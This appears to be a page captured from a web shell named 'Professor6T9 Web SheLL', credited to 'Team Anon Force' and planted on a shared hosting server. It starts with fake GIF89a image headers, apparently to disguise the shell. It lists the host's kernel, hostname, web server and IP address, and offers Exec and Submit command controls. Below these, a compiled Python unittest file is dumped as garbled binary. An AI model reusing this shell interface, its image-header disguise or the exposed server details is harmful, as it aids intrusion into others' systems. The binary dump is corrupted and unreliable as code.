GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium22.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
68.65.122.106
/
opt
/
alt
/
python36
/
lib64
/
python3.6
/
unittest
/
__pycache__
[ HOME ]
Exec
Submit
File Name : suite.cpython-36.opt-2.pyc
3 ��2a�( � @ sx d dl Z ddlmZ ddlmZ dZdd� ZG dd � d e�ZG d d� de�ZG dd � d e�Z dd� Z G dd� de�ZdS )� N� )�case)�utilTc C s t | |dd� �}|� d S )Nc S s d S )N� r r r �*/opt/alt/python36/lib64/python3.6/suite.py�<lambda> s z!_call_if_exists.<locals>.<lambda>)�getattr)�parent�attr�funcr r r �_call_if_exists s r c @ sl e Zd ZdZf fdd�Zdd� Zdd� Zdd � Zd d� Zdd � Z dd� Z dd� Zdd� Zdd� Z dd� ZdS )� BaseTestSuiteTc C s g | _ d| _| j|� d S )Nr )�_tests�_removed_tests�addTests)�self�testsr r r �__init__ s zBaseTestSuite.__init__c C s dt j| j�t| �f S )Nz <%s tests=%s>)r �strclass� __class__�list)r r r r �__repr__ s zBaseTestSuite.__repr__c C s t || j�stS t| �t|�kS )N)� isinstancer �NotImplementedr )r �otherr r r �__eq__ s zBaseTestSuite.__eq__c C s t | j�S )N)�iterr )r r r r �__iter__"